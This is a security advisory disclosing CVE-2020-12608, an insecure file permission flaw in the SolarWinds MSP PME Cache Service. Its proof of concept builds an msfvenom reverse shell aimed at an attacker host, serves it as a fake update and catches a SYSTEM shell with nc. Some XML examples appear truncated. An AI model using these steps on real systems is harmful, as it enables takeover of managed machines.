Title: SolarWinds MSP PME Cache Service - Insecure File Permissions /  
Code Execution  
Author: Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG  
CVSSv3: 8.2 [CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H]  
CVE: CVE-2020-12608  
CWE: 276  
Vulnerable version  
SolarWinds MSP PME (Patch Management Engine) before 1.1.15  
2020-04-24 Vulnerability discovered  
2020-04-27 Send details to SolarWinds PSIRT  
2020-04-27 SolarWinds confirmed the vulnerability  
2020-05-05 SolarWinds released PME version 1.1.15  
2020-05-06 Public disclosure  
An error with insecure file permissions has occurred in the SolarWinds  
MSP Cache Service, which is part of the Advanced Monitoring Agent and  
can lead to code execution. The SolarWinds MSP Cache Service is  
typically used to get new update definition files and versions for  
ThirdPartyPatch.exe or SolarWinds MSP Patch Management Engine Setup. The  
XML file CacheService.xml in %PROGRAMDATA%\SolarWinds  
MSP\SolarWinds.MSP.CacheService\config\ is writable by normal users, so  
that the parameter SISServerURL can be changed, which controls the  
location of the updates. After some analysis, we were able to provide  
modified XML files (PMESetup_details.xml and  
ThirdPartyPatch_details.xml) that point to an executable file with a  
reverse TCP payload using our controlled SISServerURL web server for  
SolarWinds MSP Cache Service.  
Proof of Concept (PoC)  
As we can see, NTFS change permissions are set to CacheService.xml by  
default. Any user on the system who is in group users can change the  
file content. This is especially a big problem on terminal servers or  
multi-user systems.  
PS C:\ProgramData\SolarWinds MSP\SolarWinds.MSP.CacheService\config>  
icacls .\CacheService.xml  
.\CacheService.xml VORDEFINIERT\Benutzer:(I)(M)  
1. Modify CacheService.xml  
In the xml file, the parameter SISServerURL was adjusted, which now  
points to a web server controlled by the attacker.  
<?xml version="1.0" encoding="utf-8"?>  
<ProxyCacheService />  
2. Payload creation  
Generate an executable file, for example using msfvenom, that  
establishes a reverse tcp connection to the attacker and store it on the  
web server.  
msfvenom -p windows/x64/shell_reverse_tcp lhost=x.x.x.x lport=4444 -f  
exe > /tmp/solarwinds-shell.exe  
3. Prepare web server  
Place the modified xml files (PMESetup_details.xml or  
ThirdPartyPatch_details.xml) on the web server in the path  
/ComponentData/RMM/1/, calculate MD5, SHA1 and SHA256 checksums of the  
executable, set correct values for SizeInBytes and increase the version.  
Example of PMESetup_details.xml  
<Name>Patch Management Engine</Name>  
<Description>Patch Management Engine</Description>  
Example of ThirdPartyPatch_details.xml  
<ComponentDetails xmlns:xsi=""  
<Name>Third Party Patch</Name>  
Third Party Patch application for Patch Management Engine RMM v 1 and later  
4. Malicious executable download  
After restarting the system or reloading the CacheService.xml, the  
service connects to the web server controlled by the attacker and  
downloads the executable file. This is then stored in the path  
%PROGRAMDATA%\SolarWinds MSP\SolarWinds.MSP.CacheService\cache\ and  
%PROGRAMDATA%\SolarWinds MSP\PME\archives\.  
[24/Apr/2020:10:57:01 +0200] "HEAD  
/ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 5307 "-" "-"  
[24/Apr/2020:10:57:01 +0200] "GET  
/ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 7585 "-" "-"  
5. Getting shell  
After a certain time the executable file is executed by SolarWinds MSP  
RPC Server service and establishes a connection with the rights of the  
system user to the attacker.  
[~]: nc -nlvp 4444  
Listening on [] (family 0, port 4444)  
Connection from [x.x.x.x] port 4444 [tcp/*] accepted (family 2, sport 49980)  
Microsoft Windows [Version 10.0.18363.778]  
(c) 2019 Microsoft Corporation. Alle Rechte vorbehalten.  
There is a new PME version 1.1.15 which comes with auto-update